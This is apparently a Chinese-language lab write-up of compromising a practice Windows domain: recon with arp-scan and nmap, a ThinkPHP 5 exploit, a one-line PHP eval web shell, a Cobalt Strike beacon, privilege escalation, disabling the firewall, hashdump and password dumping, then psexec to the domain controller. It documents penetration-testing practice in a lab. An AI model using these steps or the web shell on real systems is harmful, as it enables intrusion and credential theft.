网络环境
kali攻击机:
ip为192.168.1.128
靶机win7:
本地管理员用户leo\123.com
域管sun\Administrator dc123.com 改为 20121225Qnmxa@
ip为192.168.1.136和192.168.138.138
靶机win2008:
账号sun\admin 2020.com改为20121225Qnmxa@
ip为192.168.138.138
在win7上打开phpstudy,打开web环境
复现
使用arp-scan -l扫描内网存活主机
找到目标靶机为192.168.1.136
使用nmap进行扫描
nmap 192.168.1.136 -T4 -A -sV
发现了80端口,先访问下
发现为TP5,直接用工具打
可以执行命令,直接写入一句话木马
echo <?php @eval($_POST['cmd'])?> > shell.php
直接用蚁剑连接,然后对目标进行信息搜集
发现有两个网段,一个是1段,另一个是138段,并且在域sun.com中,DNS服务器为192.168.138.138,基本上DNS服务器就是域控
话不多说,直接上CS,直接通过powershell命令上线
设置心跳时间为1秒:sleep 1
然后使用插件直接一键提权,比如梼杌、谢公子插件等,拿到一个system权限的会话
打开system权限的会话,查看防火墙情况
shell netsh firewall show state
是关着的,我手动把它关了
查看域内计算机列表:net view
返现主机DC和WIN7
查看域控列表:net dclist
查看本机用户列表
有3个用户
接下来抓hash:hashdump
抓密码:logonpassword
然后通过“视图”-“密码凭证”查看抓到的密码
点击“视图”-“目标列表”
直接使用psexec配合SMB监听器上线DC机器
拿到了DC的beacon
网友评论